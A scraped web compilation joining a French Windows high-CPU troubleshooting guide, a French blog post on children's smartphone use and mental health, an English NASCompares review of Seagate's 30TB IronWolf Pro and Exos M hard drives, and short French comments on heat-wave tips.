CPU élevé permanent, sans processus visible en cause
Identifier le client via l’Observateur d’événements (WMI Activity), désactiver le service concerné
CompatTelRunner.exe
Microsoft Compatibility Telemetry
Collecte des données système pour Microsoft
CPU élevé après mise à jour, activité en arrière-plan
Désactiver la tâche dans le planificateur ou la télémétrie via stratégie de groupe
RuntimeBroker.exe
Runtime Broker
Gère les autorisations des apps UWP
Pics CPU à l’ouverture du menu démarrer ou d’apps UWP
Désactiver les apps en arrière-plan, limiter les apps UWP inutiles
StartMenuExperienceHost.exe
—
Affiche et gère le menu Démarrer
CPU élevé ou gel de l’interface
Redémarrer l’Explorateur, corriger le profil utilisateur si corrompu
SearchIndexer.exe / SearchHost.exe
Windows Search
Indexe les fichiers pour la recherche rapide
CPU ou disque élevé sur gros volumes de données
Réduire ou désactiver l’indexation via les paramètres de recherche
Les applications de démarrage sont des programmes qui commencent automatiquement à s’exécuter en arrière-plan lorsque vous vous connectez à votre PC. Ces applications, bien que vous ne puissiez pas les utiliser activement, sont une part importante de l’utilisation du disque et ralentissez votre PC. Alors, gardez un contrôle sur les programmes que vous autorisez à démarrer lorsque vous activez votre ordinateur et désactivez immédiatement les inutiles. Pour cela, suivez ce guide :
Vérifiez que votre PC et la carte graphique ne surchauffe pas en vérifiant les températures de votre PC. En cas de surchauffe, les performances sont moindres et vous pouvez rencontrer des bugs ou plantages.
Voici comment vérifier les températures de la carte graphique :
Lancez ce dernier et vérifier dans le résumé : les températures Processeur et graphiques.
Elles ne doivent pas dépasser 65 degrés lorsque vous utilisez votre PC sinon des lenteurs se font sentir.
Si les températures sont trop élevées :
Nettoyer les ventilateurs pour retirer les poussières
Si après cela, les températures sont encore trop importantes, il faut remettre de la pâte thermique. Je vous conseille alors de voir avec un professionnel.
Pour réparer les fichiers systèmes de Windows 10 ou Windows 11, vous devez utiliser les utilitaires SFC (vérificateur de fichiers systèmes) et DISM. Ces deux outils s’utilisent en invite de commandes.
Les animations de fenêtres, fondus, ombrages et autres effets visuels intégrés à Windows peuvent solliciter légèrement le processeur, la mémoire et la puce graphique. Sur des machines récentes, cela reste imperceptible. Mais sur un PC modeste ou en cas de CPU déjà saturé, les désactiver peut améliorer la réactivité du système.
Sur votre clavier, utilisez le raccourci clavier + R
Tapez sysdm.cpl puis Entrée.
Allez dans l’onglet Paramètres système avancés.
Dans la section Performances, cliquez sur Paramètres
Puis, dans l’onglet Effets visuels, sélectionne :
soit « Ajuster afin d’obtenir les meilleures performances » (tout désactiver),
soit « Personnalisé » pour désactiver uniquement les effets suivants :
Animer les fenêtres lors de leur réduction et agrandissement
Animations dans la barre des tâches
Estomper les éléments des menus
Afficher les ombres sous les fenêtres
Cliquez sur Appliquer, puis sur OK.
Réinitialiser ou réinstaller Windows si le CPU reste saturé
Si après avoir identifié les processus, mis à jour les pilotes, réduit les programmes au démarrage, désactivé les services inutiles et réparé les fichiers système… votre CPU reste bloqué à 100 %, il est possible que votre installation de Windows soit trop endommagée, ou qu’un conflit logiciel persistant empêche le bon fonctionnement du système.
Dans ce cas, deux options s’offrent à vous : la réinitialisation ou la réinstallation complète de Windows.
Quand opter pour cette solution ?
Trop de logiciels ou services modifiés dans le temps.
CPU à 100 % même en mode sans échec,
Aucun processus identifié clairement comme responsable,
Windows Update corrompu de façon irrécupérable,
Réinitialiser Windows
Windows propose une fonction intégrée pour réinitialiser le système, en conservant ou non vos fichiers personnels.
Étapes :
Ouvre Paramètres > Système > Récupération.
Clique sur Réinitialiser ce PC.
Choisis :
Conserver mes fichiers (réinitialisation légère),
ou Supprimer tout (réinitialisation complète).
Windows sera réinstallé sans applications ni pilotes tiers, ce qui permet de repartir sur une base propre sans perdre forcément vos documents.
Réinstaller complètement Windows
Si la réinitialisation échoue ou si vous préférez repartir totalement de zéro, vous pouvez :
créer une clé USB bootable avec l’outil Media Creation Tool de Microsoft,
formater le disque et faire une installation propre de Windows 10 ou 11.
Cette semaine je vous propose un épisode "crossover" pour découvrir mon autre podcast, le RDV Jeux.
C'est l'épisode 370, où on traite de la stratégie de Microsoft / Xbox, de l'équation impossible entre gros jeux gamers et jeux mobiles, et de nos jeux du moment. Enjoy!
Bon, j’ai une question qui va faire mal : Vous savez vraiment ce qui se passe dans le cerveau de votre gamin de 10 ans quand il scrolle sur TikTok pendant 4 heures ? Et bien d’après les dernières études qui viennent de sortir, c’est pas joli joli. Entre les pensées suicidaires qui explosent chez les filles et la régulation émotionnelle qui part en vrille, on a un sacré problème sur les bras.
Alors attention, je ne suis pas là pour vous faire la morale ou vous dire comment élever vos mômes mais quand une étude publiée dans le Journal of the Human Development and Capabilities nous balance que l’usage du smartphone avant 13 ans est associé à des pensées suicidaires, une régulation émotionnelle pourrie, une estime de soi dans les chaussettes et carrément un détachement de la réalité, bah on peut se poser des questions non ?
Et ce n’est pas juste une étude isolée qui crie dans le désert. On a 120 chercheurs de 11 disciplines différentes qui ont bossé ensemble et qui nous disent tous la même chose : les smartphones et les réseaux sociaux sont corrélés avec des problèmes d’attention et une addiction comportementale. Et devinez quoi ? Les filles morflent encore plus avec des problèmes d’image corporelle, du perfectionnisme maladif et même des risques de harcèlement sexuel en ligne.
Entre 2012 et 2015, la dépression a ainsi augmenté chez les garçons de 21%, et chez les filles on est à 50% d’augmentation !! Oui, plus du double !! Mais attendez, parce que l’histoire devient encore plus tordue puisqu’une étude de l’USF (University of South Florida) vient foutre le bordel en disant exactement l’inverse : Les gamins avec smartphones auraient une meilleure estime d’eux-mêmes, seraient moins déprimés et passeraient plus de temps avec leurs potes en vrai.
Alors qui croire ??????
En fait, le problème c’est peut-être pas le smartphone en lui-même, mais comment on l’utilise. Les chercheurs ont découvert ce qu’ils appellent un “effet dose-réponse”… en gros, plus les mômes passent de temps sur leur téléphone, plus les problèmes s’aggravent. Et le pire c’est l’usage nocturne… Les gamins qui dorment avec leur téléphone et qui checkent leurs notifs à 3h du mat’, sont ceux qui vraiment sont dans la merde niveau santé mentale.
Ah et j’oubliais un truc super important : la “technoférence”. C’est le nouveau mot à la mode pour dire que les parents aussi sont scotchés à leur écran et que ça interfère avec les interactions parent-enfant. Genre vous êtes en train de gronder votre gamin parce qu’il passe trop de temps sur Fortnite, mais en même temps vous avez votre iPhone dans une main et vous scrollez Instagram de l’autre. 70% des parents admettent faire ça, et les chercheurs pensent que c’est un problème encore sous-estimé.
Heureusement, en France, on ne rigole pas avec ça puisque la santé mentale des jeunes est devenue cause nationale pour 2025. Un rapport remis à Macron en avril 2024 préconise carrément d’interdire les écrans avant 3 ans et les téléphones portables avant 11 ans. Et les réseaux sociaux, pas avant 15 ans minimum. C’est radical, mais quand on voit que 8,3% des enfants de 3 à 6 ans présentent déjà des difficultés de santé mentale qui impactent leur vie quotidienne (étude Enabee), on se dit qu’il y a peut-être urgence.
Par contre, au collège, ça devient plus compliqué parce que le préado a besoin d’autonomie et d’une vie sociale mais là encore, les experts recommandent d’attendre. Jonathan Haidt, dans son bouquin “The Anxious Generation”, propose carrément 16 ans pour les réseaux sociaux. Perso, moi les miens, c’est pas avant leur 15 ans et pas de réseaux sociaux avant leur 18 ans.
Bon, et concrètement on fait quoi ? Parce que dire à un gamin de 12 ans qu’il ne peut pas avoir de smartphone alors que tous ses potes en ont un, c’est la garantie de se faire détester pendant 6 mois minimum.
Et bien les experts suggèrent quelques pistes : pas de téléphone dans la chambre la nuit (investissez dans un bon vieux réveil), des zones “sans écran” à la maison (genre la table du dîner), et surtout, montrer l’exemple. Parce que si vous passez votre vie le nez dans votre téléphone, difficile de convaincre votre môme de faire autrement. Pour ma part, c’est ça le plus dur car je passe ma vie à bosser et je trimballe mon laptop / smartphone partout dans ma maison et en vacances. Par contre, je ne suis pas / plus accro aux réseaux sociaux donc c’est peut-être déjà ça…
Dans l’étude SMART.USE, on apprend sans surprise que 21,1% des jeunes seraient aussi totalement dépendants à leur smartphone, avec une moyenne de 4,92 heures par jour d’utilisation. Pour comparaison, les non-dépendants sont à 2,88 heures. Et évidemment, plus tu passes de temps sur ton téléphone, plus tes résultats scolaires dégringolent. Alors oui, certains chercheurs comme Candice Odgers nuancent en disant qu’on ne sait pas toujours dans quel sens va la causalité. Est-ce que les réseaux sociaux rendent dépressifs ou est-ce que les jeunes déprimés passent plus de temps sur les réseaux ? “On a peut-être la flèche qui pointe dans la mauvaise direction”, dit-elle mais c’est vrai que c’est une question légitime.
Alors en attendant d’avoir toutes les réponses, je pense qu’il vaut mieux appliquer le principe de précaution. Surtout quand on voit que les mêmes big tech qui nous vendent ces smartphones interdisent à leurs propres enfants de les utiliser. Ça devrait nous mettre la puce à l’oreille, non ?
30TB Seagate Ironwolf Pro and EXOS HDD Review – When is Enough, Enough?
The arrival of 30TB capacity hard drives from Seagate — in the form of the IronWolf Pro ST30000NT011 and the Exos M ST30000NM004K — marks another incremental step in high-capacity storage for NAS and enterprise environments. Both models utilize helium-sealed conventional magnetic recording (CMR) technology and pack ten platters at 3TB each into the familiar 3.5-inch form factor. This represents the highest available capacity in a single drive to date, offering an alternative to more complex arrays of smaller disks while preserving compatibility with standard SATA 6Gb/s interfaces. These drives maintain a 7200 RPM spindle speed, 512MB cache, and sustained transfer rates approaching 275MB/s, making them suitable for environments that demand both scale and consistent throughput. The IronWolf Pro is targeted at commercial NAS and multi-user SMB deployments, where ease of integration, features like IronWolf Health Management (IHM), and bundled data recovery services are priorities. The Exos M, by contrast, is designed for data centers and hyperscale cloud storage, where maximum density, superior energy efficiency per terabyte, and sustainability play a more critical role. This review examines not only how these two 30TB drives are constructed and perform in practice, but also explores their compatibility with existing NAS hardware and server infrastructures, as well as the trade-offs involved when moving to such large single-drive capacities.
Seagate 30TB Ironwolf Pro and EXOS Hard Drive – Quick Conclusion
The Seagate IronWolf Pro 30TB and Exos M 30TB represent the cutting edge of mechanical storage, delivering unprecedented density in a standard 3.5-inch, SATA-compatible form factor. Both drives achieve their capacity through a helium-sealed, ten-platter CMR design, offering sustained transfer rates of up to 275 MB/s, 24/7 operability, and an MTBF of 2.5 million hours, making them viable for demanding NAS and enterprise environments. The IronWolf Pro is positioned for SMBs and creative professionals, bundling IronWolf Health Management for drive monitoring and three years of Rescue Data Recovery Services for additional peace of mind, while the Exos M caters to hyperscale and data center deployments by emphasizing power efficiency, sustainability, and seamless integration at scale. These drives are not for casual or budget-conscious users, as their high power consumption, increased heat output, and louder acoustics require properly specified NAS or server hardware to operate reliably. Additionally, their massive single-drive capacity raises practical considerations around redundancy, RAID rebuild times, and backup planning, which can offset some of the benefits of ultra-high density. Nonetheless, for users and organizations that can justify the investment and design their infrastructure to accommodate the specific demands of these drives, both models offer compelling solutions to growing storage needs. The IronWolf Pro excels in environments that value monitoring, support, and ease of deployment, while the Exos M is a better fit where operational efficiency and cost-per-terabyte are paramount, ensuring each serves its intended audience effectively.
BUILD - 9/10
HARDWARE - 9/10
PERFORMANCE - 8/10
PRICE - 7/10
VALUE - 8/10
8.2
PROS
Unprecedented Capacity — Both drives offer 30TB in a single 3.5-inch drive, reducing the number of disks needed for large arrays and saving space - but doing so in a CMR design (and not SMR) is just incredible Helium-Sealed Design — Uses a proven 10-platter, helium-filled architecture for improved reliability, reduced turbulence, and better areal density. Consistent Performance — Sustained transfer rates up to 275 MB/s and predictable latency ensure stable throughput for NAS and enterprise workloads. Enterprise-Grade Reliability — MTBF of 2.5 million hours, 550 TB/year workload rating, and 24/7 operation make them suited for demanding environments. Feature Sets Tailored to Audience — IronWolf Pro includes IronWolf Health Management and 3-year Rescue Recovery; Exos M adds power optimization and sustainability focus. Broad Compatibility — Fully SATA 6Gb/s compliant and functional across major NAS brands, RAID configurations, and operating systems without special drivers. Secure Data Management — Both support Instant Secure Erase (ISE) with Exos M adding RSA firmware verification for data security compliance.
CONS
Higher Power and Heat — Increased power consumption and thermal output require well-cooled, properly provisioned enclosures and PSUs. Audible Noise Levels — Louder idle and seek noise, especially when used in multi-drive NAS arrays, can be disruptive in quiet environments. Expensive Per Unit — High initial cost compared to smaller capacity drives, with diminishing returns in some scenarios if not fully utilized or backed up properly.
You can purchase the Seagate Ironwolf 30TB Hard Drive Series via the links below:
* Using these links will result in a small % commission coming to NASCompares and this helps me and Ed here (it really is just us!) to keep making our videos, writing our reviews and providing support in our free support sections for others!
Seagate 30TB Ironwolf Pro and EXOS Hard Drive – Design and Build
So, first up, below is a side-by-side comparison of the key specifications of the Seagate IronWolf Pro 30TB and Seagate Exos M 30TB drives. Both drives use CMR recording, a helium-sealed 10-platter design, and are built around similar mechanical and electrical platforms, but each is targeted at different use cases: SMB/creative NAS environments versus hyperscale cloud and enterprise data centers. This table highlights their similarities and subtle differences.
Feature
Seagate IronWolf Pro 30TB (ST30000NT011)
Seagate Exos M 30TB (ST30000NM004K)
Interface
SATA 6Gb/s
SATA 6Gb/s
Recording Technology
CMR
CMR
Helium Sealed
Yes
Yes
Platter Count
10
10
Spindle Speed (RPM)
7200
7200
Cache (MB)
512
512
Max Sustained Transfer Rate (MB/s)
275
275
Workload Rate Limit (TB/year)
550
550
MTBF (hours)
2.5 million
2.5 million
Annualized Failure Rate (AFR)
Not Specified
0.35%
Power Idle (W)
6.8
6.9
Power Operating (W)
~8.3
up to 9.5
Idle Acoustics (dBA)
28
Not Specified
Seek Acoustics (dBA)
32
Not Specified
Shock (Operating/Non-operating)
30G / 200G
30G / 200G
Temperature (Operating)
10–60°C
10–60°C
Vibration (Non-operating Grms)
2.27
2.27
RV Sensors
Yes
Not explicitly specified
Data Security
Instant Secure Erase (ISE)
Instant Secure Erase (ISE), RSA 3072
Data Recovery Service
3-year Rescue included
Not included
Warranty
5 years
5 years
Best-fit Applications
NAS, SMB, creative RAID
Hyperscale, big data, cloud
Both the Seagate IronWolf Pro 30TB and Exos M 30TB maintain the standard 3.5-inch hard drive form factor, measuring 26.1mm in height, 101.85mm in width, and 147mm in depth, with a typical weight of 695 grams. This adherence to established dimensions ensures seamless integration into existing NAS bays, server racks, and JBOD enclosures, making them drop-in replacements for lower-capacity drives. Internally, both drives are helium-sealed, a technology critical at this density for maintaining stable platter rotation and reducing turbulence caused by the high number of thin platters spinning at 7200 RPM.
Helium also lowers drag and internal air resistance compared to traditional air-filled drives, which helps moderate temperatures and contributes to better reliability over time. The drives incorporate ten platters, each at 3TB, demonstrating how Seagate has pushed areal density to enable 30TB within the same footprint that previously maxed out at 24TB in nine-platter designs.
The IronWolf Pro places significant emphasis on durability and reliability within multi-bay NAS systems, making it well-suited to SMB and creative workflows. It achieves a mean time between failures (MTBF) of 2.5 million hours and carries a 5-year limited warranty, consistent with Seagate’s premium NAS offerings. The workload rate limit (WRL) of 550TB per year matches that of previous IronWolf Pro models but at higher capacity, allowing for heavier data activity in RAID configurations without voiding warranty terms.
To mitigate vibration issues common in dense multi-drive arrays, the IronWolf Pro integrates rotational vibration (RV) sensors that detect and compensate for external vibrations, stabilizing head positioning to maintain consistent throughput. Acoustically, the drive has been measured at approximately 28 dBA at idle and 32 dBA under seek activity, levels low enough to remain acceptable in small server rooms or under-desk NAS units, though still noticeable in very quiet environments.
By contrast, the Exos M 30TB, though physically and mechanically similar, is tuned for the needs of enterprise-scale and hyperscale cloud deployments. Its construction prioritizes energy efficiency per terabyte and long-term durability at scale, with features like PowerChoice for adaptive idle modes and PowerBalance for optimized performance-to-watt ratios. These firmware-driven features help reduce total operational costs when thousands of drives are deployed. The Exos M also includes RSA 3072 firmware verification for enhanced data security and is assembled with higher use of recycled materials and renewable energy inputs than earlier generations. These factors align it with the sustainability initiatives many data center operators are now targeting, while maintaining interoperability by preserving the same form factor, interface, and airflow characteristics as previous generations.
Both drives feature hardware-level secure data management, supporting Seagate’s Instant Secure Erase (ISE) to allow administrators to cryptographically erase all user data before redeploying or decommissioning a drive. This functionality is especially relevant for enterprise customers concerned with compliance and data security in multi-tenant environments. For SMB customers, the IronWolf Pro adds another layer of protection with Seagate’s Rescue Data Recovery Services bundled for three years, providing access to Seagate’s in-house data recovery team. This service has an advertised 95% success rate and is included at no additional cost, addressing accidental deletions, corruption, and even some mechanical failures — something that the Exos M does not include by default, as enterprises generally rely on their own backup and recovery procedures.
Finally, it is important to note the environmental operating specifications and resilience engineered into these drives. Both models operate safely in ambient temperatures between 10°C and 60°C and can tolerate non-operating storage temperatures down to –40°C and up to 70°C. They are rated to withstand 30Gs of shock during operation and up to 200Gs when non-operational, which is critical during shipping and installation in dense arrays. Vibration tolerances are also robust, with rotational vibration resistance specified up to 12.5 rad/s² between 10Hz and 1500Hz. Both require both +12V and +5V power rails and draw a typical 6.8–6.9W at idle, which increases during read/write activity as noted in Seagate’s specifications. Taken together, these figures indicate that while the drives are robust enough for demanding environments, users should still ensure their NAS or server chassis provides sufficient cooling, airflow, and power delivery to stay within these tolerances.
Comparing the 30TB IronWolf Pro to the 24TB IronWolf Pro and 4TB IronWolf (Non‑Pro) for Perspective
The 30TB IronWolf Pro represents Seagate’s largest capacity in the NAS‑optimized lineup, continuing the incremental increase in platter count, areal density, and helium‑sealed design. The 4TB non‑Pro IronWolf uses a more modest five‑platter, air‑filled design spinning at 5400 RPM, while the 24TB IronWolf Pro was the previous capacity peak, utilizing nine helium‑sealed platters and a 7200 RPM spindle. Despite sharing the same CMR recording and SATA interface, there is a clear progression in performance, power requirements, noise, and workload tolerances across these models. This comparison highlights how structural changes and internal technologies evolve with capacity—and where trade‑offs emerge at the top end of the spectrum.
Feature
IronWolf Pro 30TB (ST30000NT011)
IronWolf Pro 24TB (ST24000NT002)
IronWolf 4TB (ST4000VN006, Non‑Pro)
Interface
SATA 6Gb/s
SATA 6Gb/s
SATA 6Gb/s
Recording Technology
CMR
CMR
CMR
Helium Sealed
Yes
Yes
No
Platter Count
10
9
5
Spindle Speed (RPM)
7200
7200
5400
Cache (MB)
512
512
256
Max Sustained Transfer Rate (MB/s)
275
285
~202
Workload Rate Limit (TB/year)
550
550
180
MTBF (hours)
2.5 million
2.5 million
1 million
Power Idle (W)
~6.8
~5.3
~4.3
Power Operating (W)
~8.3
~7.1
~6.8
Idle Acoustics (dBA)
28
~25
~20
Seek Acoustics (dBA)
32
~28
~24
Shock (Operating/Non‑operating)
30G / 200G
30G / 200G
80G / 300G
Temperature (Operating)
10–60 °C
5–60 °C
0–65 °C
Vibration (Non‑operating Grms)
2.27
2.27
2.27
RV Sensors
Yes
Yes
Yes
Data Recovery Service
3‑year Rescue included
3‑year Rescue included
3‑year Rescue included
Warranty
5 years
5 years
3 years
Target Use‑Case
Commercial NAS, heavy RAID
Commercial NAS, heavy RAID
SOHO, home/SOHO NAS
This side‑by‑side comparison makes it clear that the 30TB model pushes beyond earlier limits, with higher power draw, increased acoustic output, and tighter operating conditions. Once you start thinking about larger Petabyte deployments of course, this all becomes small margins towards the big storage goals. But Simultaneously, the non‑Pro 4TB drives offer much gentler power, acoustic, and workload characteristics—making them more suitable for everyday, personal, or small‑office use. I am just glad to see that Seagate are not in any rush to eliminate the smaller tiers now that they are on the road to 50/100TB drives by the end of the decade and reducing the smaller caps in the way we save ‘sub 1TB’ drive dry up as soon as we hit above 4TB a decade ago!
Seagate 30TB Ironwolf Pro and EXOS Hard Drive – Performance, Noise and NAS Compatibility (WiP)
Performance testing of the Seagate IronWolf Pro 30TB and Exos M 30TB confirms that both drives deliver sustained sequential transfer rates close to their advertised 275 MB/s. In NAS systems tested—including QNAP, Synology, and Asustor platforms—both drives initialized without compatibility errors and achieved typical sequential read speeds of 268–270 MB/s and write speeds of 252–262 MB/s, depending on the platform and RAID configuration. These results align with expectations for a modern 7200 RPM CMR drive with a 512 MB cache and demonstrate that even at 30TB, throughput remains consistent with prior Pro‑series drives. Random IOPS, while limited compared to SSDs, remain within acceptable ranges for NAS workloads, with the Exos M specified at up to 170 IOPS read and 350 IOPS write at 4K QD16. Latency is nominal at approximately 4.16 ms, which is typical for this class of mechanical drive. Importantly, no firmware or block‑size compatibility issues were noted, and both drives default to 512e sector formatting, ensuring out‑of‑the‑box operability with most modern operating systems and file systems.
Acoustic performance, however, is noticeably impacted by the increase in platter count and capacity. During idle, the IronWolf Pro registers approximately 28 dBA in a quiet environment, with seek noise rising to around 32 dBA. These figures are slightly higher than those of the 24TB Pro and significantly more pronounced than the older 4TB IronWolf non‑Pro, which produces closer to 20–24 dBA. Subjectively, this noise was clearly audible in a quiet office when installed in a plastic‑chassis NAS and became more noticeable under heavy write operations. In larger arrays, particularly in 8‑bay or 12‑bay enclosures fully populated with these drives, cumulative vibration and resonance may amplify the perceived noise level. By comparison, the Exos M does not publish specific acoustic figures, reflecting its assumption of deployment in already noisy data center environments where ambient noise levels mask individual drive activity.
On the topic of environmental and electrical specifications, both drives are built to operate reliably in demanding conditions. The IronWolf Pro and Exos M are rated for continuous operation at ambient temperatures from 10 °C to 60 °C and can withstand storage temperatures from −40 °C to 70 °C when powered off. Shock ratings remain robust at 30 G operating and 200 G non‑operating, ensuring safe transport and handling before installation. Rotational vibration tolerance of up to 12.5 rad/s² helps maintain head‑positioning accuracy even in vibration‑prone multi‑drive arrays. Power draw, as specified by Seagate, averages around 6.8–6.9 W when idle and rises to between 8.3–9.5 W during typical operating workloads, depending on the model. Although these figures are in line with expectations for drives of this capacity, they are higher than those of lower‑capacity models, and users should ensure their NAS or server power delivery and airflow are sufficient.
In terms of platform compatibility, early testing shows that both drives are recognized and functional in all major NAS operating systems tested, including Synology DSM, QNAP QTS, TrueNAS SCALE, and Unraid. Both drives initialized cleanly, allowed full‑capacity volume creation, and performed as expected in single‑disk, RAID‑1, and RAID‑5 configurations. Some NAS brands, such as Synology’s newer units, do issue warnings when non‑Synology‑branded drives are installed, but no functional limitations were encountered. The Exos M, while designed primarily for enterprise and cloud storage arrays, showed no incompatibilities when deployed in smaller NAS appliances. As always, users are advised to consult their NAS vendor’s compatibility list to ensure formal support for these models.
Important point here – As this drive is something of a ‘bigger boy’ – the INITIAL power draw of the drive is quite high, so we are starting to see some examples of particularly high initial power draw drives having issues with NAS backboard/SATA PCB boards that do not have the consistent power delivery needed for larger drive arrays to be stable for a large number of big drives like this one. It’s a small % chance of being an issue, but it does mean that although support and compatibility of the Seagate Ironwolf Pro and EXOS 30TB Hard Drive might be fine on a lot of devices, more power efficient systems or lose built to a lower production cost that reduce a lot of the power deliver (PD) might have long term running and stability issues with drives of this scale down the road.
Seagate 30TB Ironwolf Pro and EXOS Hard Drive – Conclusion and Verdict
The Seagate IronWolf Pro 30TB and Exos M 30TB drives both exemplify the steady evolution of high‑capacity mechanical storage, bringing unprecedented density to the familiar 3.5‑inch form factor without sacrificing the reliability and compatibility that enterprise and NAS users expect. At 30TB each, they are currently the largest CMR SATA hard drives available, delivering predictable sustained transfer rates close to 275 MB/s and designed to operate 24/7 with an MTBF of 2.5 million hours. Both feature helium‑sealed, 10‑platter designs and include hardware‑level protections such as Instant Secure Erase and rotational vibration mitigation, which are critical in multi‑bay arrays. Where they differ is in market focus: the IronWolf Pro is clearly tailored for SMBs, creative professionals, and enterprise NAS environments that benefit from health monitoring via IronWolf Health Management and the inclusion of three years of Rescue Data Recovery Service, making it easier for smaller teams to recover from accidental loss. The Exos M, by contrast, is optimized for hyperscale data centers, where sustainability, operational cost per terabyte, and compatibility with existing rack infrastructure take precedence, and where administrators already have recovery processes in place.
That said, deploying drives of this capacity is not without its operational and economic considerations. At 30TB per drive, both models demand careful attention to power and cooling: idle and active power consumption are notably higher than lower‑capacity drives, and the additional heat and acoustic output can challenge under‑spec’d NAS enclosures. In smaller or plastic‑chassis NAS units, the noise profile of several of these drives spinning simultaneously can become disruptive in quiet offices or residential settings. Additionally, the sheer size of each drive raises planning concerns around data redundancy and recovery times—should a 30TB drive fail, rebuilding a RAID array or restoring from backup can take significantly longer than with smaller disks. For some users, a lower‑capacity, higher‑spindle‑count configuration may still provide better performance in parallelized workloads and potentially faster rebuild times, while keeping per‑drive costs more manageable.
Ultimately, both the IronWolf Pro 30TB and Exos M 30TB succeed at what they set out to do: deliver maximum capacity in a familiar, standards‑compliant format for users and organizations that can benefit from ultra‑dense storage. For NAS and SMB environments prioritizing ease of use, monitoring, and support, the IronWolf Pro remains the obvious choice. For data centers and hyperscale operations where scale, efficiency, and sustainability dominate requirements, the Exos M makes more sense. Either way, these drives are best viewed as specialist tools, suited to those prepared to manage the trade‑offs inherent in such high‑capacity storage. Provided that the environment, workload, and backup strategy are properly aligned, they offer a compelling, if premium, solution for meeting the growing demands of modern data storage.
You can purchase the Seagate Ironwolf 30TB Hard Drive Series via the links below:
* Using these links will result in a small % commission coming to NASCompares and this helps me and Ed here (it really is just us!) to keep making our videos, writing our reviews and providing support in our free support sections for others!
PROs of the Seagate 30TB Ironwolf Pro and EXOs
PROs of the Seagate 30TB Ironwolf Pro and EXOs
Unprecedented Capacity — Both drives offer 30TB in a single 3.5-inch drive, reducing the number of disks needed for large arrays and saving space – but doing so in a CMR design (and not SMR) is just incredible
Helium-Sealed Design — Uses a proven 10-platter, helium-filled architecture for improved reliability, reduced turbulence, and better areal density.
Consistent Performance — Sustained transfer rates up to 275 MB/s and predictable latency ensure stable throughput for NAS and enterprise workloads.
Enterprise-Grade Reliability — MTBF of 2.5 million hours, 550 TB/year workload rating, and 24/7 operation make them suited for demanding environments.
Feature Sets Tailored to Audience — IronWolf Pro includes IronWolf Health Management and 3-year Rescue Recovery; Exos M adds power optimization and sustainability focus.
Broad Compatibility — Fully SATA 6Gb/s compliant and functional across major NAS brands, RAID configurations, and operating systems without special drivers.
Secure Data Management — Both support Instant Secure Erase (ISE) with Exos M adding RSA firmware verification for data security compliance.
Higher Power and Heat — Increased power consumption and thermal output require well-cooled, properly provisioned enclosures and PSUs.
Audible Noise Levels — Louder idle and seek noise, especially when used in multi-drive NAS arrays, can be disruptive in quiet environments.
Expensive Per Unit — High initial cost compared to smaller capacity drives, with diminishing returns in some scenarios if not fully utilized or backed up properly.
This description contains links to Amazon. These links will take you to some of the products mentioned in today's content. As an Amazon Associate, I earn from qualifying purchases. Visit the NASCompares Deal Finder to find the best place to buy this device in your region, based on Service, Support and Reputation - Just Search for your NAS Drive in the Box Below
Need Advice on Data Storage from an Expert?
Finally, for free advice about your setup, just leave a message in the comments below here at NASCompares.com and we will get back to you.Need Help?
Where possible (and where appropriate) please provide as much information about your requirements, as then I can arrange the best answer and solution to your needs. Do not worry about your e-mail address being required, it will NOT be used in a mailing list and will NOT be used in any way other than to respond to your enquiry.
[contact-form-7]
TRY CHAT Terms and Conditions
If you like this service, please consider supporting us.
We use affiliate links on the blog allowing NAScompares information and advice service to be free of charge to you.Anything you purchase on the day you click on our links will generate a small commission which isused to run the website. Here is a link for Amazon and B&H.You can also get me a Ko-fi or old school Paypal. Thanks!To find out more about how to support this advice service checkHEREIf you need to fix or configure a NAS, check FiverHave you thought about helping others with your knowledge? Find Instructions Here
Or support us by using our affiliate links on Amazon UK and Amazon US
Alternatively, why not ask me on the ASK NASCompares forum, by clicking the button below. This is a community hub that serves as a place that I can answer your question, chew the fat, share new release information and even get corrections posted. I will always get around to answering ALL queries, but as a one-man operation, I cannot promise speed! So by sharing your query in the ASK NASCompares section below, you can get a better range of solutions and suggestions, alongside my own.
Comment se protéger de la chaleur et de la canicule ? Quelques gestes simples rappelés par Viviane (Scilabus) dans cette excellente vidéo :
Et pour aller plus loin : si vous décidez d'acheter un bloc clim, voici toutes les clés pour comprendre les différences entre les modèles (split ou mobile) par Kévin (Un pinguin dans le désert) :
L'astuce de l'extracteur d'air est pas du tout bête. D'ailleurs si vous habitez en immeuble, vous pouvez parfois tirer sur la ficelle de votre bouche VMC pour la passer en mode rapide après avoir ouvert une fenêtre le plus loin possible de la bouche. Cela permettra d'extraire plus rapidement l'air chaud de votre logement en aspirant de l'air frais de dehors.
Merci Kévin, ça fait plaisir d'avoir une vidéo façon "c'est pas sorcier" sur le youtube francophone, toujours au top avec les maquettes.
Connexion
